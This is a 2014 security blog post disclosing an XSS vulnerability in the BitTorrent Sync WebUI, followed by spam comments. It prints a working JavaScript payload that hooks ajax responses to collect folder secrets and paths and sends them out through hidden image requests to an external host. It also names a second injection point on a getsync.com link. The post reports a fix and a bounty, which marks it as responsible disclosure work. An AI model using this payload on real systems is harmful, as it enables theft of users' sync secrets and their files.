Monday, December 29, 2014

BitTorrent Sync WebUI XSS vulnerability

BitTorrent Sync WebUI (<= 1.4.92) is affected by XSS vulnerability that could be exploitable in some rare scenarios.

Proof of concept video (stealing secrets):

PoC exploit uses jQuery global ajax hook (jQuery library is already used in WebUI) to fetch necessary data (secrets in our case) directly from internal ajax responses instead of DOM parsing.

Sample payload:
fakeImgUrl = 'http://cinu.pl/research/btsync/webui-xss/image/';
folders = [];

// ajax hook - all data is there
$(document).ajaxComplete(function(event, xhr, settings) {
 try {
  json=$.parseJSON(xhr.responseText);

  for(var i in json.folders) {
   var str=encodeURIComponent(json.folders[i].secret+':'+json.folders[i].path+':'+json.folders[i].status);

   if (folders.indexOf(str)==-1) {
    folders.push(str);
    $('body').append('<img style=\'display:none\' src=\''+fakeImgUrl+'?'+str+'\'>');
    console.log('SEND ' + str);
   }
  }
 } catch (e) {
  // error
  return;
 }
});

I've found also minor XSS on https://link.getsync.com/#f=XSS_HERE

Reported: 15.10.2014
Fixed: 16.10.2014
Unexpected surprise bounty: 500 USD

11 comments:

  1. When someone writes an article he/she keeps the idea of a user in his/her brain that how a user can understand it.
    Thus that’s why this paragraph is amazing. Thanks!

    ReplyDelete
  2. Can you suggest a good hosting provider at a honest price?
    Kudos, I appreciate it!

    ReplyDelete
  3. I’m gone to inform my little brother, that he
    should also pay a quick visit this website on regular basis to obtain updated from latest news.

    ReplyDelete
  4. I’ve read a few just right stuff here. Definitely
    worth bookmarking for revisiting. I wonder how a lot effort you place to make such a excellent informative
    website.

    ReplyDelete
  5. My partner and I absolutely love your blog and find many of your post’s
    to be just what I’m looking for. Do you offer
    guest writers to write content in your case? I wouldn’t mind composing a post or elaborating on most of the subjects you write regarding here.
    Again, awesome blog!

    ReplyDelete
  6. Hi, I do think this is an excellent blog. I stumbledupon it �� I may
    return yet again since I book marked it. Money
    and freedom is the greatest way to change, may you be rich and continue to help others.

    ReplyDelete
  7. You ought to be a part of a contest for one of the best websites on the internet.
    I’m going to highly recommend this web site!

    ReplyDelete
  8. I really like what you guys are up too. Such clever work and reporting!
    Keep up the very good works guys I’ve added you guys to my blogroll.

    ReplyDelete
  9. First off I want to say fantastic blog! I had a quick question in which
    I’d like to ask if you don’t mind. I was curious to know how you
    center yourself and clear your head before writing.

    I have had a difficult time clearing my mind in getting
    my thoughts out there. I truly do enjoy writing however it just
    seems like the first 10 to 15 minutes are generally
    lost just trying to figure out how to begin. Any ideas or tips?

    Many thanks!

    ReplyDelete
  10. I am really enjoying reading your well written Information. I have read your post carefully and relies that this is a very helpful for me ... Jual Boneka Wisuda .. | Jaket Bomber Pria

    ReplyDelete